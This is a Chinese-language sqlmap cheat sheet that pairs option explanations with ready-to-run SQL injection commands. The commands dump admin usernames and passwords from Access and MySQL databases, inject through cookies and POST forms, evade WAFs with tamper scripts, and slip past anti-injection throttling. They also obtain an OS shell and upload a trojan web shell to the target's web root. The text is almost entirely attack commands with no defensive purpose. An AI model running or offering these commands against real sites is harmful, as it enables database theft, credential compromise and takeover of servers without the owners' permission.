**參數解釋**
星號
在注入的過程中,有時候是偽靜態的頁面,可以使用星號表示可能存在注入的部分
--data
使用post方式提交的時候,就需要用到data參數了
-p
當我們已經事先知道哪一個參數存在注入就可以直接使用-p來指定,從而減少運行時間
--level
不同的level等級,SQLMAP所采用的策略也不近相同,當–level的參數設定為2或者2以上的時候,sqlmap會嘗試注入Cookie參數;當–level參數設定為3或者3以上的時候,會嘗試對User-Angent,referer進行注入。
--random-agent
使用該參數,SQLMAP會自動的添加useragent參數,如果你知道它要求你用某一種agent,你也應當用user-agent選項自己指定所需的agent
--technique
這個參數可以指定SQLMAP使用的探測技術,默認情況下會測試所有的方式。
支持的探測方式如下:
B: Boolean-based blind SQL injection(布爾型注入)
E: Error-based SQL injection(報錯型注入)
U: UNION query SQL injection(可聯合查詢注入)
S: Stacked queries SQL injection(可多語句查詢注入)
T: Time-based blind SQL injection(基于時間延遲注入)
**Access注入**
sqlmap -u 注入點url //判斷是否有注入
sqlmap -u 注入點url --tables //access直接猜表
sqlmap -u 注入點url --colums -T admin //爆出admin表,猜解它的字段
sqlmap -u 注入點url --dump -T admin -C "username,password" //猜字段內容
**MySQL數據庫注入**
sqlmap -u url --dbs //獲取數據庫
sqlmap -u url -D 指定的數據庫 --tables //獲取數據庫中的表
sqlmap -u url -D 指定的數據庫 -T 表名 --columns //獲取表字段
sqlmap -u url -D 指定的數據庫 -T 表名 -C id,user,pass --dump //獲取字段內容
**Cookie注入**
網站有判斷,不讓用and,update等參數時就得加上Cookie。
sqlmap -u url --cookie="cookie值" --dbs(或)--tables --level 2
**POST表單注入**
注入點:
http://testasp.vulnweb.com/Login.asp
**幾種方式:**
sqlmap -r burp攔截數據.txt -p Pass(測試參數) //從文件讀取數據包
sqlmap -u http://testasp.vulnweb.com/Login.asp --forms //自動搜索表單
sqlmap -u http://testasp.vulnweb.com/Login.asp --data "Name=1&Pass=1" //手動添加數據
**獲取系統交互shell**
1.sqlmap -u http://url.. --os-shell //或者windows可以用--os-cmd 或--sql-shell
2.選擇網站服務端語言
3.填寫網站根目錄C:/www/
**偽靜態注入**
sqpmap -u http://victim.com/id/666*.html --dbs //在html擴展名前加個'*'
**請求延時**
Web防注入措施,在訪問兩次錯誤頁面后,第三次必須訪問正確的頁面
--delay 2 //延時兩秒訪問
--safe-freq 30 //人為配置次數
**繞過WAF防火墻**
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch
--tamper "space2morehash.py" //使用tamper腳本繞過
類似腳本
space2hash.py base64encode.py charencode.py
**file參數使用**
必須為dba權限
sqlmap -u url --is-dba //查看是否dba權限
sqlmap -u url --file-write=本地木馬路徑(D:/shell.php)
--file-dest=目標根目錄(C:/www/shell.php)
**常用tamper腳本使用**
地址:http://mp.weixin.qq.com/s/vEEoMacmETUA4yZODY8xMQ